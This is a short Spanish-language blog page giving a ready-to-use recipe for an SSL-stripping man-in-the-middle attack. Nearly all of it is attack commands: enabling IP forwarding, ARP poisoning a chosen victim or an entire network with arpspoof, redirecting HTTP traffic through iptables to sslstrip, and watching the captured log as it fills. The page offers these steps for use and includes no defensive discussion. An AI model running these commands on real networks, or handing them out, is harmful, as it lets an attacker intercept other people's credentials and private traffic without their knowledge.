V
e
r

l
i
s
t
a
d
o

tractatus@lapipaplena:/# _

 

sslstrip

Herramienta para engañar al usuario haciéndole pensar que se encuentra en un sitio de Internet con cifrado SSL [HTTPS], cuando en realidad todos los datos están siendo transmitidos en abierto [HTTP].

Configuración de reenvío de paquetes IP:

# echo 1 > /proc/sys/net/ipv4/ip_forward

Envenenamiento ARP (paquete dsniff):

# arpspoof -i eth0 -t ip_victima ip_router

En caso de querer atacar toda la red, solo especificar la ip router:

# arpspoof -i eth0 ip_router

Redirección de puertos usando Iptables:

# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 31715

Al reiniciar el ordenador se borrará la regla, si se quiere borrar al momento cambiar "-A" por un "-D" en el comando anterior.

Arrancar sslstrip y ponerlo a la escucha:

# sslstrip -k -f -l 31715 -w archivo.log

Visionar en tiempo real los paquetes capturados:

# tail -f archivo.log
Navegando por staredsi.eu aceptas las cookies que utilizamos en esta web. Más información: Ver política de cookies
[0] 0:bash*
1837 entradas - Acerca del Tractatus
La Pipa Plena 2018